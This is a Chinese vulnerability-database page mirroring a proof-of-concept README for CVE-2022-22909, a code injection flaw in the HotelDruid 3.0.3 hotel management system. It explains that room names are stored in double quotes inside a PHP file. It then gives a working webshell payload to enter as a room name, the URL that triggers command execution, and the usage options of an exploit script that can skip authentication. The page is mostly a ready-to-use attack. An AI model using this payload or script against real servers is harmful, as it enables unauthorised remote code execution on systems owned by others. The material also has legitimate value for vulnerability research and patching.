漏洞平台

POC详情： a015b18c866e525dd18490231b6c8f9a25a124c4

来源

https://github.com/0z09e/CVE-2022-22909

关联漏洞

标题： HotelDruid 代码注入漏洞 (CVE-2022-22909)
描述：HotelDruid是Digitaldruid.net团队的一套酒店管理系统。该系统包括客房管理、财务管理和库存管理等功能。 HotelDruid 3.0.3版本存在代码注入漏洞，攻击者可利用该漏洞远程执行代码。

描述

Hotel Druid 3.0.3 Code Injection to Remote Code Execution

介绍

# CVE-2022-22909
## Description
A Code Injection vulnerability has been found on the `Hotel Druid v3.0.3` application, which an attacker could exploit to execute remote code on the server.
**For a successful exploitation, an attacker should have the privilege to add a new room.**

## Vulnerability description
The vulnerability occurs because room names are getting stored inside a file named `/dati/selectappartamenti.php` using **Double Quotes**.

```php
<?php 
echo "
<option value=\"Room1\">Room1</option>
<option value=\"Room2\">Room2</option>
<option value=\"Room3\">Room3</option>
";
?>

```

## Payload
To perform a successful exploitation, add a room with the following payload as room name.

```php
{${system($_REQUEST[cmd])}}
```

After adding a new room, go to `/dati/selectappartamenti.php` and trigger the webshell by passing a command using the `cmd` parameter.

## Usage
```
usage: hotel-druid.py [-h] -t TARGET [-u USERNAME] [-p PASSWORD] [--noauth]

optional arguments:
  -h, --help            show this help message and exit

required arguments:
  -t TARGET, --target TARGET
                        Target URL. Example : http://10.20.30.40/path/to/hoteldruid
  -u USERNAME, --username USERNAME
                        Username
  -p PASSWORD, --password PASSWORD
                        password
  --noauth              If No authentication is required to access the dashboard
```

## Example
If the application has no authentication.
Use the `--noauth` flag to perform no authentication.

![](https://github.com/0z09e/CVE-2022-22909/raw/main/img/Pasted%20image%2020220217230935.png)

If the server has authentication enabled, use the `--username` and `--password` to perform authentication.

![](https://github.com/0z09e/CVE-2022-22909/blob/main/img/Pasted%20image%2020220217231404.png)

## Credits
Researcher and POC writer - [0z09e](http://twitter.com/0z09e)
***

文件快照


 [4.0K]  /data/pocs/a015b18c866e525dd18490231b6c8f9a25a124c4
├── [5.7K]  exploit.py
├── [4.0K]  img
│   ├── [ 51K]  Pasted image 20220217230935.png
│   ├── [ 52K]  Pasted image 20220217231404.png
│   └── [ 18K]  Pasted image 20220217232112.png
├── [ 34K]  LICENSE
└── [1.8K]  README.md

1 directory, 6 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。